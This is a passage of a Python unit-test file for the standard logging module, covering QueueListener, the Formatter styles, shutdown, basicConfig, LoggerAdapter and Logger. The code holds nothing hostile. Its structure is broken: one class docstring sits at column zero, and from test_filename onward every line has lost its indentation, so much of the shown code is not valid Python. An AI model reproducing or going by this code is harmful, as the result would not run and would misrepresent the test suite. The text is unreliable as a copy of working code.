            logger.removeHandler(handler)
            handler.close()

        @patch.object(logging.handlers.QueueListener, 'handle')
        def test_handle_called_with_queue_queue(self, mock_handle):
            """All five messages per round reach QueueListener.handle when
            backed by a plain queue.Queue."""
            for i in range(self.repeat):
                log_queue = queue.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
            self.assertEqual(mock_handle.call_count, 5 * self.repeat,
                             'correct number of handled log messages')

        @patch.object(logging.handlers.QueueListener, 'handle')
        def test_handle_called_with_mp_queue(self, mock_handle):
            """Same as above, backed by a multiprocessing.Queue."""
            # Issue 28668: The multiprocessing (mp) module is not functional
            # when the mp.synchronize module cannot be imported.
            support.import_module('multiprocessing.synchronize')
            for i in range(self.repeat):
                log_queue = multiprocessing.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
                log_queue.close()
                log_queue.join_thread()
            self.assertEqual(mock_handle.call_count, 5 * self.repeat,
                             'correct number of handled log messages')

        @staticmethod
        def get_all_from_queue(log_queue):
            """Generator draining *log_queue* until it is empty."""
            try:
                while True:
                    yield log_queue.get_nowait()
            except queue.Empty:
                # A bare return ends the generator; the previous `return []`
                # set a StopIteration value that iteration ignores anyway.
                return

        def test_no_messages_in_queue_after_stop(self):
            """
            Five messages are logged then the QueueListener is stopped. This
            test then gets everything off the queue. Failure of this test
            indicates that messages were not registered on the queue until
            _after_ the QueueListener stopped.
            """
            # Issue 28668: The multiprocessing (mp) module is not functional
            # when the mp.synchronize module cannot be imported.
            support.import_module('multiprocessing.synchronize')
            for i in range(self.repeat):
                # Named log_queue (not 'queue') so the stdlib `queue` module
                # used by get_all_from_queue() is not shadowed.
                log_queue = multiprocessing.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))

                items = list(self.get_all_from_queue(log_queue))
                log_queue.close()
                log_queue.join_thread()

                # Either nothing is left, or only the listener's sentinel.
                expected = [[], [logging.handlers.QueueListener._sentinel]]
                self.assertIn(items, expected,
                              'Found unexpected messages in queue: %s' % (
                                  [m.msg if isinstance(m, logging.LogRecord)
                                   else m for m in items]))
# A zero offset shared by utcoffset() and dst().
ZERO = datetime.timedelta(0)

class UTC(datetime.tzinfo):
    """Minimal concrete tzinfo representing UTC, for timestamp tests."""

    def utcoffset(self, dt):
        return ZERO

    def dst(self, dt):
        # UTC has no daylight saving time.
        return ZERO

    def tzname(self, dt):
        return 'UTC'

# Shared singleton instance used by the formatter tests.
utc = UTC()
class FormatterTest(unittest.TestCase):
    """Tests for logging.Formatter with %, {} and $ styles."""

    def setUp(self):
        """Common attribute dict used to build LogRecords for the tests."""
        self.common = {
            'name': 'formatter.test',
            'level': logging.DEBUG,
            'pathname': os.path.join('path', 'to', 'dummy.ext'),
            'lineno': 42,
            'exc_info': None,
            'func': None,
            'msg': 'Message with %d %s',
            'args': (2, 'placeholders'),
        }
        self.variants = {
        }

    def get_record(self, name=None):
        """Build a LogRecord from self.common, optionally overlaid with the
        named variant from self.variants."""
        result = dict(self.common)
        if name is not None:
            result.update(self.variants[name])
        return logging.makeLogRecord(result)

    def test_percent(self):
        # Test %-formatting
        r = self.get_record()
        f = logging.Formatter('${%(message)s}')
        self.assertEqual(f.format(r), '${Message with 2 placeholders}')
        # An unknown field raises KeyError on format.
        f = logging.Formatter('%(random)s')
        self.assertRaises(KeyError, f.format, r)
        self.assertFalse(f.usesTime())
        f = logging.Formatter('%(asctime)s')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('%(asctime)-15s')
        self.assertTrue(f.usesTime())
        # 'asctime' as plain text (no placeholder) does not use time.
        f = logging.Formatter('asctime')
        self.assertFalse(f.usesTime())

    def test_braces(self):
        # Test {}-formatting
        r = self.get_record()
        f = logging.Formatter('$%{message}%$', style='{')
        self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
        f = logging.Formatter('{random}', style='{')
        self.assertRaises(KeyError, f.format, r)
        self.assertFalse(f.usesTime())
        f = logging.Formatter('{asctime}', style='{')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('{asctime!s:15}', style='{')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('{asctime:15}', style='{')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('asctime', style='{')
        self.assertFalse(f.usesTime())

    def test_dollars(self):
        # Test $-formatting
        r = self.get_record()
        f = logging.Formatter('$message', style='$')
        self.assertEqual(f.format(r), 'Message with 2 placeholders')
        # '$$' is an escaped literal dollar sign.
        f = logging.Formatter('$$%${message}%$$', style='$')
        self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
        f = logging.Formatter('${random}', style='$')
        self.assertRaises(KeyError, f.format, r)
        self.assertFalse(f.usesTime())
        f = logging.Formatter('${asctime}', style='$')
        self.assertTrue(f.usesTime())
        # Unclosed brace: not a valid placeholder.
        f = logging.Formatter('${asctime', style='$')
        self.assertFalse(f.usesTime())
        f = logging.Formatter('$asctime', style='$')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('asctime', style='$')
        self.assertFalse(f.usesTime())

    def test_invalid_style(self):
        """An unknown style character must raise ValueError."""
        self.assertRaises(ValueError, logging.Formatter, None, None, 'x')

    def test_time(self):
        """formatTime honors the converter and default/custom date formats."""
        r = self.get_record()
        dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
        # We use None to indicate we want the local timezone
        # We're essentially converting a UTC time to local time
        r.created = time.mktime(dt.astimezone(None).timetuple())
        r.msecs = 123
        f = logging.Formatter('%(asctime)s %(message)s')
        f.converter = time.gmtime
        self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
        self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
        f.format(r)
        self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
    """BufferingFormatter whose header/footer bracket the batch with its size."""

    def formatHeader(self, records):
        count = len(records)
        return '[(%d)' % count

    def formatFooter(self, records):
        count = len(records)
        return '(%d)]' % count
class BufferingFormatterTest(unittest.TestCase):
    """Tests for logging.BufferingFormatter and a customized subclass."""

    def setUp(self):
        # Two simple records whose default formatting is just the message.
        self.records = [
            logging.makeLogRecord({'msg': 'one'}),
            logging.makeLogRecord({'msg': 'two'}),
        ]

    def test_default(self):
        """Default BufferingFormatter concatenates formatted records."""
        f = logging.BufferingFormatter()
        self.assertEqual('', f.format([]))
        self.assertEqual('onetwo', f.format(self.records))

    def test_custom(self):
        """Custom header/footer wrap the batch; a line formatter applies
        per record."""
        f = TestBufferingFormatter()
        self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
        lf = logging.Formatter('<%(message)s>')
        f = TestBufferingFormatter(lf)
        self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
    """Tests for exception and stack-info text on formatted records."""

    def test_formatting(self):
        """logging.exception(..., stack_info=True) populates exc_text and
        stack_info on the emitted record."""
        r = self.root_logger
        h = RecordingHandler()
        r.addHandler(h)
        try:
            raise RuntimeError('deliberate mistake')
        except:
            logging.exception('failed', stack_info=True)
        r.removeHandler(h)
        h.close()
        r = h.records[0]
        self.assertTrue(r.exc_text.startswith('Traceback (most recent '
                                              'call last):\n'))
        self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
                                            'deliberate mistake'))
        self.assertTrue(r.stack_info.startswith('Stack (most recent '
                                              'call last):\n'))
        self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
                                              'stack_info=True)'))
class LastResortTest(BaseTest):
    """Tests for logging.lastResort, the handler of last resort."""

    def test_last_resort(self):
        # Test the last resort handler
        root = self.root_logger
        root.removeHandler(self.root_hdlr)
        old_lastresort = logging.lastResort
        old_raise_exceptions = logging.raiseExceptions

        try:
            # lastResort emits WARNING and above to stderr.
            with support.captured_stderr() as stderr:
                root.debug('This should not appear')
                self.assertEqual(stderr.getvalue(), '')
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), 'Final chance!\n')

            # No handlers and no last resort, so 'No handlers' message
            logging.lastResort = None
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                msg = 'No handlers could be found for logger "root"\n'
                self.assertEqual(stderr.getvalue(), msg)

            # 'No handlers' message only printed once
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), '')

            # If raiseExceptions is False, no message is printed
            root.manager.emittedNoHandlerWarning = False
            logging.raiseExceptions = False
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), '')
        finally:
            root.addHandler(self.root_hdlr)
            logging.lastResort = old_lastresort
            logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
    """Stand-in handler that records which lifecycle methods are invoked.

    Each call is appended to *called* as '<identifier> - <method name>'.
    """

    def __init__(self, identifier, called):
        # Install a recording stub for every handler lifecycle method.
        for name in ('acquire', 'flush', 'close', 'release'):
            setattr(self, name, self.record_call(identifier, name, called))

    def record_call(self, identifier, method_name, called):
        """Return a zero-argument callable that logs the call to *called*."""
        def inner():
            called.append('{} - {}'.format(identifier, method_name))
        return inner
class RecordingHandler(logging.NullHandler):
    """NullHandler variant that remembers every record passed to handle()."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # All records seen so far, in order of arrival.
        self.records = []

    def handle(self, record):
        """Keep track of all the emitted records."""
        self.records.append(record)
class ShutdownTest(BaseTest):

    """Test suite for the shutdown method."""

    def setUp(self):
        """Track recorded handler calls and preserve raiseExceptions."""
        super(ShutdownTest, self).setUp()
        self.called = []

        raise_exceptions = logging.raiseExceptions
        self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)

    def raise_error(self, error):
        """Return a zero-arg callable that raises *error*."""
        def inner():
            raise error()
        return inner

    def test_no_failure(self):
        """shutdown() flushes/closes handlers in reverse registration order."""
        # create some fake handlers
        handler0 = FakeHandler(0, self.called)
        handler1 = FakeHandler(1, self.called)
        handler2 = FakeHandler(2, self.called)

        # create live weakref to those handlers
        handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
        logging.shutdown(handlerList=list(handlers))

        expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
                    '1 - acquire', '1 - flush', '1 - close', '1 - release',
                    '0 - acquire', '0 - flush', '0 - close', '0 - release']
        self.assertEqual(expected, self.called)

    def _test_with_failure_in_method(self, method, error):
        """Make *method* on a fake handler raise *error* during shutdown;
        release must still be the last call."""
        handler = FakeHandler(0, self.called)
        setattr(handler, method, self.raise_error(error))
        handlers = [logging.weakref.ref(handler)]
        logging.shutdown(handlerList=list(handlers))

        self.assertEqual('0 - release', self.called[-1])

    # OSError and ValueError raised during shutdown are always swallowed.
    def test_with_ioerror_in_acquire(self):
        self._test_with_failure_in_method('acquire', OSError)

    def test_with_ioerror_in_flush(self):
        self._test_with_failure_in_method('flush', OSError)

    def test_with_ioerror_in_close(self):
        self._test_with_failure_in_method('close', OSError)

    def test_with_valueerror_in_acquire(self):
        self._test_with_failure_in_method('acquire', ValueError)

    def test_with_valueerror_in_flush(self):
        self._test_with_failure_in_method('flush', ValueError)

    def test_with_valueerror_in_close(self):
        self._test_with_failure_in_method('close', ValueError)

    # Other exceptions are swallowed only when raiseExceptions is False.
    def test_with_other_error_in_acquire_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('acquire', IndexError)

    def test_with_other_error_in_flush_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('flush', IndexError)

    def test_with_other_error_in_close_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('close', IndexError)

    def test_with_other_error_in_acquire_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'acquire', IndexError)

    def test_with_other_error_in_flush_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'flush', IndexError)

    def test_with_other_error_in_close_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'close', IndexError)
class ModuleLevelMiscTest(BaseTest):

    """Test suite for some module level methods."""

    def test_disable(self):
        """logging.disable() sets the manager threshold; bare call defaults
        to CRITICAL (3.7, issue #28524)."""
        old_disable = logging.root.manager.disable
        # confirm our assumptions are correct
        self.assertEqual(old_disable, 0)
        self.addCleanup(logging.disable, old_disable)

        logging.disable(83)
        self.assertEqual(logging.root.manager.disable, 83)

        # test the default value introduced in 3.7
        # (Issue #28524)
        logging.disable()
        self.assertEqual(logging.root.manager.disable, logging.CRITICAL)

    def _test_log(self, method, level=None):
        """Call the module-level logging.<method> and verify it logs at the
        expected level without implicitly calling basicConfig()."""
        called = []
        support.patch(self, logging, 'basicConfig',
                      lambda *a, **kw: called.append((a, kw)))

        recording = RecordingHandler()
        logging.root.addHandler(recording)

        log_method = getattr(logging, method)
        if level is not None:
            log_method(level, "test me: %r", recording)
        else:
            log_method("test me: %r", recording)

        self.assertEqual(len(recording.records), 1)
        record = recording.records[0]
        self.assertEqual(record.getMessage(), "test me: %r" % recording)

        expected_level = level if level is not None else getattr(logging, method.upper())
        self.assertEqual(record.levelno, expected_level)

        # basicConfig was not called!
        self.assertEqual(called, [])

    def test_log(self):
        self._test_log('log', logging.ERROR)

    def test_debug(self):
        self._test_log('debug')

    def test_info(self):
        self._test_log('info')

    def test_warning(self):
        self._test_log('warning')

    def test_error(self):
        self._test_log('error')

    def test_critical(self):
        self._test_log('critical')

    def test_set_logger_class(self):
        """setLoggerClass rejects non-Logger classes and round-trips."""
        self.assertRaises(TypeError, logging.setLoggerClass, object)

        class MyLogger(logging.Logger):
            pass

        logging.setLoggerClass(MyLogger)
        self.assertEqual(logging.getLoggerClass(), MyLogger)

        logging.setLoggerClass(logging.Logger)
        self.assertEqual(logging.getLoggerClass(), logging.Logger)

    @support.requires_type_collecting
    def test_logging_at_shutdown(self):
        """Logging from a __del__ during interpreter shutdown must work."""
        # Issue #20037
        code = """if 1:
            import logging

            class A:
                def __del__(self):
                    try:
                        raise ValueError("some error")
                    except Exception:
                        logging.exception("exception in __del__")

            a = A()"""
        rc, out, err = assert_python_ok("-c", code)
        err = err.decode()
        self.assertIn("exception in __del__", err)
        self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
    """Tests for LogRecord construction and its optional attributes."""

    def test_str_rep(self):
        """str(record) looks like '<LogRecord: ...>'."""
        r = logging.makeLogRecord({})
        s = str(r)
        self.assertTrue(s.startswith('<LogRecord: '))
        self.assertTrue(s.endswith('>'))

    def test_dict_arg(self):
        """A single dict argument is kept as record.args and used for
        %(key)s substitution in the message."""
        h = RecordingHandler()
        r = logging.getLogger()
        r.addHandler(h)
        d = {'less' : 'more' }
        logging.warning('less is %(less)s', d)
        self.assertIs(h.records[0].args, d)
        self.assertEqual(h.records[0].message, 'less is more')
        r.removeHandler(h)
        h.close()

    def test_multiprocessing(self):
        """processName defaults to 'MainProcess' and matches
        multiprocessing.current_process().name when mp is available."""
        r = logging.makeLogRecord({})
        self.assertEqual(r.processName, 'MainProcess')
        try:
            import multiprocessing as mp
            r = logging.makeLogRecord({})
            self.assertEqual(r.processName, mp.current_process().name)
        except ImportError:
            pass

    def test_optional(self):
        """thread/process attributes are populated by default and are None
        when the corresponding logging.log* flags are disabled."""
        r = logging.makeLogRecord({})
        NOT_NONE = self.assertIsNotNone
        NOT_NONE(r.thread)
        NOT_NONE(r.threadName)
        NOT_NONE(r.process)
        NOT_NONE(r.processName)
        log_threads = logging.logThreads
        log_processes = logging.logProcesses
        log_multiprocessing = logging.logMultiprocessing
        try:
            logging.logThreads = False
            logging.logProcesses = False
            logging.logMultiprocessing = False
            r = logging.makeLogRecord({})
            NONE = self.assertIsNone
            NONE(r.thread)
            NONE(r.threadName)
            NONE(r.process)
            NONE(r.processName)
        finally:
            logging.logThreads = log_threads
            logging.logProcesses = log_processes
            logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
    def setUp(self):
        """Snapshot global logging state and detach root handlers."""
        super(BasicConfigTest, self).setUp()
        self.handlers = logging.root.handlers
        self.saved_handlers = logging._handlers.copy()
        self.saved_handler_list = logging._handlerList[:]
        self.original_logging_level = logging.root.level
        self.addCleanup(self.cleanup)
        logging.root.handlers = []

    def tearDown(self):
        """Close any handlers installed by basicConfig during the test."""
        for h in logging.root.handlers[:]:
            logging.root.removeHandler(h)
            h.close()
        super(BasicConfigTest, self).tearDown()

    def cleanup(self):
        """Restore the logging state captured in setUp()."""
        setattr(logging.root, 'handlers', self.handlers)
        logging._handlers.clear()
        logging._handlers.update(self.saved_handlers)
        logging._handlerList[:] = self.saved_handler_list
        logging.root.level = self.original_logging_level
    def test_no_kwargs(self):
        """basicConfig() with no arguments installs the documented defaults."""
        logging.basicConfig()

        # handler defaults to a StreamHandler to sys.stderr
        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.StreamHandler)
        self.assertEqual(handler.stream, sys.stderr)

        formatter = handler.formatter
        # format defaults to logging.BASIC_FORMAT
        self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
        # datefmt defaults to None
        self.assertIsNone(formatter.datefmt)
        # style defaults to %
        self.assertIsInstance(formatter._style, logging.PercentStyle)

        # level is not explicitly set
        self.assertEqual(logging.root.level, self.original_logging_level)
    def test_strformatstyle(self):
        """basicConfig(style='{') formats via str.format-style placeholders."""
        with support.captured_stdout() as output:
            logging.basicConfig(stream=sys.stdout, style="{")
            logging.error("Log an error")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue().strip(),
                "ERROR:root:Log an error")

    def test_stringtemplatestyle(self):
        """basicConfig(style='$') formats via string.Template placeholders."""
        with support.captured_stdout() as output:
            logging.basicConfig(stream=sys.stdout, style="$")
            logging.error("Log an error")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue().strip(),
                "ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
